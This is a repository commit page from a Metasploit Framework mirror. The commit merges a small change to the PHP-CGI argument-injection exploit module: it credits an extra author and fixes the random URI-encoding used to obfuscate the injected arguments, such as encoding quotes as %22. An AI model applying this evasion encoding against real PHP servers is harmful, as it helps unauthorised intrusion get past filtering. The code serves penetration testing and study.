infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'php_cgi_arg_injection' of https://github.com/jjarmoc/metasploit-framework into jjarmoc-php_cgi_arg_injection

unstable
sinn3r 2012-06-13 00:40:02 -05:00
parent c3c9051014 bbfe0f8f49
commit 597726d433
1 changed files with 4 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
modules/exploits/multi/http/php_cgi_arg_injection.rb
View File

@ -29,7 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
a system-defined manner" from the RFC) and then passes them to the CGI a system-defined manner" from the RFC) and then passes them to the CGI
binary." binary."
}, },
'Author' => [ 'egypt', 'hdm' ], 'Author' => [ 'egypt', 'hdm', #original msf exploit
'jjarmoc' ], #added URI encoding obfuscation
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Version' => '$Revision$', 'Version' => '$Revision$',
'References' => [ 'References' => [
@ -125,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
if val if val
val = rand_encode(val) val = rand_encode(val)
val.gsub!('=','%3d') # = must always be encoded val.gsub!('=','%3d') # = must always be encoded
val.gsub!('"','%2f') # " too val.gsub!('"','%22') # " too
end end
ret = '' ret = ''
@ -177,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote
max.times { chars << rand(string.length)} max.times { chars << rand(string.length)}
end end
end end
chars.uniq.sort.reverse.each{|index| string[index] = "%"+"%02x" % string[index]} chars.uniq.sort.reverse.each{|index| string[index] = Rex::Text.uri_encode(string[index,1], "hex-all")}
string string
end end